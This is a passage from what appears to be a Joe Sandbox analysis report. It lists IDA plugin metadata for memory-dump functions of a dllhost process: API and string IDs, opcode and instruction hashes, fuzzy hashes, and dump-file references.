                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Legacy$UEFI
                                                                                                      • API String ID: 2994545307-634100481
                                                                                                      • Opcode ID: 7c3e90653c7f96b278ac4c4ff6a7dccb4745a686e0f6173afd193d7646ad67c7
                                                                                                      • Instruction ID: d150a6c2e346232e547e64c075bd356e819e1617179f5fd4f5044a8a161780f8
                                                                                                      • Opcode Fuzzy Hash: 7c3e90653c7f96b278ac4c4ff6a7dccb4745a686e0f6173afd193d7646ad67c7
                                                                                                      • Instruction Fuzzy Hash: 5B613871E043189FDB24DFE8C840BAEBBBAFB48744F1440A9E559EB291D731E940CB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$$
                                                                                                      • API String ID: 0-233714265
                                                                                                      • Opcode ID: 101c7a36d1be14f9ef434e13e5a451186479e926a3ccde2f03fa3c2a325e050c
                                                                                                      • Instruction ID: 8b456b966277a58ac4f7d97e6365b62bfc2c9d42203473d2e78c8521163e885e
                                                                                                      • Opcode Fuzzy Hash: 101c7a36d1be14f9ef434e13e5a451186479e926a3ccde2f03fa3c2a325e050c
                                                                                                      • Instruction Fuzzy Hash: 4761AC75A00749DFDB20EFE8C580BADB7B9BF04304F1845A9D615EB280DBB4A951CB81
                                                                                                      Strings
                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0380A309
                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0380A2FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                      • API String ID: 0-2876891731
                                                                                                      • Opcode ID: b4e3f36c5c61b892b3a99df1c2c7b6f02cc8454c9f571d7b8e248c9b0d5f1190
                                                                                                      • Instruction ID: 22be3578a1261aa2f9287712859c5c4a78b7017228680051dc8a4852d3aaa29c
                                                                                                      • Opcode Fuzzy Hash: b4e3f36c5c61b892b3a99df1c2c7b6f02cc8454c9f571d7b8e248c9b0d5f1190
                                                                                                      • Instruction Fuzzy Hash: 2941AE34A04749DBDB25CFA9C840B69B7B8FF85704F1944E9EC04DB2A1E779D900CB51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local\$@
                                                                                                      • API String ID: 0-380025441
                                                                                                      • Opcode ID: abf8865ed94522b5a117ed0e3f3b1e4e265403a2bbb93ff6b6e3bf678a889e22
                                                                                                      • Instruction ID: 6934b26a40776b41c2916ba96c4ae18a6c834a46115696886e7954484f9e985d
                                                                                                      • Opcode Fuzzy Hash: abf8865ed94522b5a117ed0e3f3b1e4e265403a2bbb93ff6b6e3bf678a889e22
                                                                                                      • Instruction Fuzzy Hash: 6D31AE7A1083089FC310DF68D480A5BBBE8EBC6654F4849AEF495C7210DA74DD04CBD3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: MUI
                                                                                                      • API String ID: 0-1339004836
                                                                                                      • Opcode ID: 1fe68cd02c8ed72823c3a8ca0ca39c7122b19161418aae4075f81c17653fadf9
                                                                                                      • Instruction ID: 595fc843cd3c503c1bf478e4f3ed09a1c95cbbdd3fea0c03f8970341cc310ef3
                                                                                                      • Opcode Fuzzy Hash: 1fe68cd02c8ed72823c3a8ca0ca39c7122b19161418aae4075f81c17653fadf9
                                                                                                      • Instruction Fuzzy Hash: 7C824B75E002189FDBA4CFE9CD80BADF7B5BF48314F1882A9E859EB290D7709945CB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 519676f3249aba2f047a67b4e6fa8e1ff1823dbc834a8cf2b931e792d965ef69
                                                                                                      • Instruction ID: ffdb498acd213fd34f4c734b784ff796877d74c22ce47a78fb1cac6fc207224c
                                                                                                      • Opcode Fuzzy Hash: 519676f3249aba2f047a67b4e6fa8e1ff1823dbc834a8cf2b931e792d965ef69
                                                                                                      • Instruction Fuzzy Hash: F2A14A75608745CFD350DFA8C880A2ABBE9BF88304F1449AEF585DB391E730E945CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0ef3b8fe40a1bac97a99adc771a3341154a63b041bcabf23d599760d04d2d3a
                                                                                                      • Instruction ID: 18ca8475c634114a5877fe149a379b7a8b2117c735b98857786aeb12147923e3
                                                                                                      • Opcode Fuzzy Hash: c0ef3b8fe40a1bac97a99adc771a3341154a63b041bcabf23d599760d04d2d3a
                                                                                                      • Instruction Fuzzy Hash: 984129B4D01688AEDB20DFA9C480AAEFBF4FB49340F1441AEE559E7311E7309945CBA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                      • Instruction ID: 29c697a60b1427908fabfa90bdab50a9cf6c1c71787a5aec1d6a0b704c8a2bee
                                                                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                      • Instruction Fuzzy Hash: 68614A75D0125DABDB61DFE9CC80BAEBBB8FF84714F1445A9E810E72A0D7749A00CB61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                      • Instruction ID: dba75cbc9a425925ac76565426acf9484484d6d9df5b51c1c90e258d13d34e87
                                                                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                      • Instruction Fuzzy Hash: 7F51BB72514705AFD721EF98CC40F6AB7E8FB84750F0409A9BA84DB290D7B4ED15CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PreferredUILanguages
                                                                                                      • API String ID: 0-1884656846
                                                                                                      • Opcode ID: 1fc82e4611a3627b517196d382db25f738fe83f49a81effdfc24ff0f34824114
                                                                                                      • Instruction ID: b432d1dcd0cd485eda2870cfc8f92176ba92730a3d5665166a78c625381323e9
                                                                                                      • Opcode Fuzzy Hash: 1fc82e4611a3627b517196d382db25f738fe83f49a81effdfc24ff0f34824114
                                                                                                      • Instruction Fuzzy Hash: C9419976D0021AABDB22DAD5C840BEEF7F9AF88750F0501A6E952EB354D6B4DD40C7B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryHash
                                                                                                      • API String ID: 0-2202222882
                                                                                                      • Opcode ID: a5ea87882b763ec5aeada3a39847d4f4dbe1f5dae59cb56398596d3da574985e
                                                                                                      • Instruction ID: cc004f4b5eb6ae474532cc1e1830087b39992cb21744f5ae09afb1b937c633b3
                                                                                                      • Opcode Fuzzy Hash: a5ea87882b763ec5aeada3a39847d4f4dbe1f5dae59cb56398596d3da574985e
                                                                                                      • Instruction Fuzzy Hash: 514131B5D0062CABDB21DAA4CC84FDEB77DAB45714F0045E5EA08EB140DB709E898FA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: verifier.dll
                                                                                                      • API String ID: 0-3265496382
                                                                                                      • Opcode ID: aec23cd4f465cd7cb08a541f1fcaa656028b51c98b685327d916641989edfa5e
                                                                                                      • Instruction ID: fd9603141e7bf80e42d3426fabb566c5c5dd435a7fc6be62b47bb9d4c19be25b
                                                                                                      • Opcode Fuzzy Hash: aec23cd4f465cd7cb08a541f1fcaa656028b51c98b685327d916641989edfa5e
                                                                                                      • Instruction Fuzzy Hash: 383175757003029FDB24EFA9D850A36B6E9EB49710F5888F9E505DF685E771CC80C790
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: kLsE
                                                                                                      • API String ID: 0-3058123920
                                                                                                      • Opcode ID: f7d52f553ac1d454bf852491a8c734bdedfc4335c319e16fb2e6b9e8cf1e1237
                                                                                                      • Instruction ID: fa73e36436eb326cd3368e599cad49b6ab2fd2d42a11d4f73d77d12b703bc655
                                                                                                      • Opcode Fuzzy Hash: f7d52f553ac1d454bf852491a8c734bdedfc4335c319e16fb2e6b9e8cf1e1237
                                                                                                      • Instruction Fuzzy Hash: 5B413571100F414EE721FBECE885F667B94EB40724F1806E9E950CF1C9E7B98485D7A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Actx
                                                                                                      • API String ID: 0-89312691
                                                                                                      • Opcode ID: d86c88abe3713117a72c7a7caa90eb066df40b58dfcb76214c048a3526187f30
                                                                                                      • Instruction ID: 2808f54bedd4fdd485cddb38ab3d4318a8464a10b8f7577396d43e8743c27c00
                                                                                                      • Opcode Fuzzy Hash: d86c88abe3713117a72c7a7caa90eb066df40b58dfcb76214c048a3526187f30
                                                                                                      • Instruction Fuzzy Hash: B811843030C6068BEBA4C99DCD5063AB295EB87228F3885AAD452CB3D0D671DC41CBB0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrCreateEnclave
                                                                                                      • API String ID: 0-3262589265
                                                                                                      • Opcode ID: 3172e0fd433e817c3eeb3ceaa6300ba59ee5570a7fd79b548d3c59eb7fabe0a2
                                                                                                      • Instruction ID: 6a34f4f5b9b706780de6a4edcec4690cc7f5ed54805e07c8ec275adc2a345bfa
                                                                                                      • Opcode Fuzzy Hash: 3172e0fd433e817c3eeb3ceaa6300ba59ee5570a7fd79b548d3c59eb7fabe0a2
                                                                                                      • Instruction Fuzzy Hash: EE2134B56083449FC320EF5AC808A5BFBE8FBD5B00F004A5EF5A09B250DBB4D405CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f2f1bd8c561b02b9ad8237540c83af67fee50df3c1c910323b9f8a4ee781f22
                                                                                                      • Instruction ID: 1163cc021b7150017cab30605bbf565c15d4d0fad8dbc130191193209b27f308
                                                                                                      • Opcode Fuzzy Hash: 8f2f1bd8c561b02b9ad8237540c83af67fee50df3c1c910323b9f8a4ee781f22
                                                                                                      • Instruction Fuzzy Hash: E2428F75A006168FDB19CF99C480AAEF7B6FF88314B1885A9F956EB340D734E941CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea68545505e2f878bf9a47db1bc19012803e02b4006d140cd4613904cf651b5e
                                                                                                      • Instruction ID: cc90b6a0342e66d0991bcf79525e6637f122bb22bb569627135c9409c15d762d
                                                                                                      • Opcode Fuzzy Hash: ea68545505e2f878bf9a47db1bc19012803e02b4006d140cd4613904cf651b5e
                                                                                                      • Instruction Fuzzy Hash: 0F329E75E012299BCF25DFE8C894BAEBBB5FF44714F1801A9E805EB380E7359941CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3065be8c5e70a03e254f261db4c89d7483da3acd59055ff73f66f76c812612e7
                                                                                                      • Instruction ID: faf596d65c885d6888b07d0b602687df7b8d0b8ee653d071360ee85479d22ace
                                                                                                      • Opcode Fuzzy Hash: 3065be8c5e70a03e254f261db4c89d7483da3acd59055ff73f66f76c812612e7
                                                                                                      • Instruction Fuzzy Hash: BD22BE74204A558BEB29CFADC094772B7F1AF44305F0884DAE896CFA85E73DE552CB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e7ca6f37c7afc400cafa151925bd9b7ba7e8b6735185fdb64e25c88ad7a59b51
                                                                                                      • Instruction ID: e3ddf385e1bd7221c4d9c95a36894c9b6d6628679f8005288f18b46f08023364
                                                                                                      • Opcode Fuzzy Hash: e7ca6f37c7afc400cafa151925bd9b7ba7e8b6735185fdb64e25c88ad7a59b51
                                                                                                      • Instruction Fuzzy Hash: 4F229035A102568FCB19CF98C4D4AAAF7B6FF89304B2885EDD455DB346DB30E942CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3257bfaa88c970e490b4f2299597b703462ad6a7ebbf6cccce6a93af5e58bc3b
                                                                                                      • Instruction ID: 137262c68bfd930795fe0b6109f57df4d4ddc1fc7dd7d99ca4a175b8274fdad9
                                                                                                      • Opcode Fuzzy Hash: 3257bfaa88c970e490b4f2299597b703462ad6a7ebbf6cccce6a93af5e58bc3b
                                                                                                      • Instruction Fuzzy Hash: F4D1A175A0061AAFCF15DFA4C890BBAB7E5BF54204F0846ADFA15DB380E734D941CB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fd620dcfb33cd5cd7ed9229ce8eefdb4e9a91a13f01607730ff7b5ee701f4e6c
                                                                                                      • Instruction ID: cda8355abcff204c9efb7065c5ebe1820bb10fde550258ab187a4a551ef9b7cc
                                                                                                      • Opcode Fuzzy Hash: fd620dcfb33cd5cd7ed9229ce8eefdb4e9a91a13f01607730ff7b5ee701f4e6c
                                                                                                      • Instruction Fuzzy Hash: 4EC17F71E006199FDB28CFDAC844BAEF7B5AF44314F1882E9D915EB2D0D770A945CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction ID: d75d1d935624b799e4a6e39f6fbf818598bbc7feebc8e984bac0b2e62e651d59
                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction Fuzzy Hash: FFB16379A00608AFDB24EFE5C940EABB7B9FF84304F944499A942DB791DB74E905CB10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: a414b9b155abd8d3bef3b5f8398c84861347a1d4de97dacbb317634d21e292ca
                                                                                                      • Instruction ID: 81983ead35b499666f974c29fcb46954c991f49faa8152ca2f3db594fdb664ac
                                                                                                      • Opcode Fuzzy Hash: a414b9b155abd8d3bef3b5f8398c84861347a1d4de97dacbb317634d21e292ca
                                                                                                      • Instruction Fuzzy Hash: FAA12975A00619AFEB12EFA8CC45FAE7BB9EF45750F054094F900EF2A0D7759850CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
